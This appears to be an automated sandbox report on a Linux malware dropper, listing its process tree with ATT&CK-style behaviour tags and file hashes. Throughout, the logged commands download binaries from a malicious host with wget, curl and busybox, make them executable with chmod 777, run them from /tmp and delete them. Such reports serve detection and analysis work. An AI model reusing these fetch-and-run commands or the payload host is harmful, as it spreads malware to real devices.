/bin/rmrm XRBx0OWfxg9dixbdIcYYs0ovMj2TzBede92⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk./Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm Bkc0O0k9RaCcNVCZUArKbd88efvzaHr8Vk2⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- System Network Configuration Discovery
PID:952
-
-
/bin/chmodchmod 777 osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp./osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm osgyw4XghhSY8eMYdS7Za2SryVm3luCWLp2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- System Network Configuration Discovery
PID:959
-
-
/bin/chmodchmod 777 MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK1./MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm MDfAKymXWQ9M7GtfsqvazJAF5KkHbyXjK12⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU./uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm uqRjS7pTw2oagkkUA7R6JvIeYioQ3UhYqU2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi./bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm bVDOkk4iv8pA86syuSRe9ei07bItakz7Zi2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh3./f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm f9b62hXSZp9plRvCQ7avQiZ8uu9JeBEwh32⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n./4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm 4Q6b6kfQ1eIuYXKAMWZL4ev36xKNb26s0n2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw./AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm AGYhDHBlw5WhnphUO7uE7YqGeWLgulfYsw2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs./jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm jhBgZ7uS4B63xxyJZRpsFwuqEttb03GVZs2⤵PID:1004
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97